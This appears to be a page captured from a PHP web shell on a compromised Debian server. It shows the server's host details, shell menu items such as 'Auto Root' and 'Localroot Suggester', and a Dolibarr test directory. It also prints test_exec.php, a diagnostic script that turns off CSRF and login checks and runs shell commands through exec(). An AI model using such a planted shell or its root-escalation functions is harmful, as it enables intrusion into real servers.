Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
gmd.bdcloud.fr /
public /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
buttons.php
5.17
KB
-rw-r--r--
2022-09-27 16:06
index.html
1
B
-rw-r--r--
2022-09-27 16:06
test_arrays.php
17.5
KB
-rw-r--r--
2022-09-27 16:06
test_badges.php
16.2
KB
-rw-r--r--
2022-09-27 16:06
test_csrf.php
2.25
KB
-rw-r--r--
2022-09-27 16:06
test_exec.php
2.6
KB
-rw-r--r--
2022-09-27 16:06
test_forms.php
4.32
KB
-rw-r--r--
2022-09-27 16:06
test_sessionlock.php
2.12
KB
-rw-r--r--
2022-09-27 16:06
Save
Rename
<?php if (!defined('NOREQUIREUSER')) { define('NOREQUIREUSER', '1'); } if (!defined('NOREQUIREDB')) { define('NOREQUIREDB', '1'); } if (!defined('NOREQUIRESOC')) { define('NOREQUIRESOC', '1'); } if (!defined('NOREQUIRETRAN')) { define('NOREQUIRETRAN', '1'); } if (!defined('NOSTYLECHECK')) { define('NOSTYLECHECK', '1'); // Do not check style html tag into posted data } if (!defined('NOCSRFCHECK')) { define('NOCSRFCHECK', '1'); // Do not check anti CSRF attack test } if (!defined('NOTOKENRENEWAL')) { define('NOTOKENRENEWAL', '1'); // Do not check anti POST attack test } if (!defined('NOREQUIREMENU')) { define('NOREQUIREMENU', '1'); // If there is no need to load and show top and left menu } if (!defined('NOREQUIREHTML')) { define('NOREQUIREHTML', '1'); // If we don't need to load the html.form.class.php } if (!defined('NOREQUIREAJAX')) { define('NOREQUIREAJAX', '1'); // Do not load ajax.lib.php library } if (!defined("NOLOGIN")) { define("NOLOGIN", '1'); // If this page is public (can be called outside logged session) } // If you don't need session management (can't be logged if no session used). You must also set // NOCSRFCHECK, NOTOKENRENEWAL, NOLOGIN // Disable module with GETPOST('disablemodules') won't work. Variable 'dol_...' will not be set. // $_SESSION are then simple vars if sessions are not active. // TODO We can close session with session_write_close() as soon as we just need read access everywhere in code. if (!defined("NOSESSION")) { define("NOSESSION", '1'); } print "*** SHOW SESSION STATUS<br>\n"; print "Legend:<br>\n"; print 'PHP_SESSION_DISABLED='.PHP_SESSION_DISABLED."<br>\n"; print 'PHP_SESSION_NONE='.PHP_SESSION_NONE."<br>\n"; print 'PHP_SESSION_ACTIVE='.PHP_SESSION_ACTIVE."<br>\n"; print '<br>'; print 'session_status='.session_status().' (before main.inc.php)<br>'; print '<br><br>'."\n"; require '../../main.inc.php'; // Security if ($dolibarr_main_prod) { accessforbidden('Access forbidden when $dolibarr_main_prod is set to 1'); } /* * View */ print "*** TEST READ OF /tmp/test.txt FILE<br>\n"; $out=''; $ret=0; $file = '/tmp/test.txt'; $f=fopen($file, 'r'); if ($f) { $s=fread($f, 4096); print $s; fclose($f); } else { print "Failed to open file ".$file."<br>\n"; } print '<br><br>'."\n"; print "*** TEST READ OF /test.txt FILE AND LS /dev/std*<br>\n"; exec('cat /test.txt; ls /dev/std*; sleep 1;', $out, $ret); print "ret=".$ret."<br>\n"; print_r($out); print '<br>'; print '<br><br>'."\n"; print "*** TRY TO RUN CLAMDSCAN<br>\n"; $ret = 0; $out = null; exec('/usr/bin/clamdscan --fdpass filethatdoesnotexists.php', $out, $ret); print "ret=".$ret."<br>\n"; print_r($out);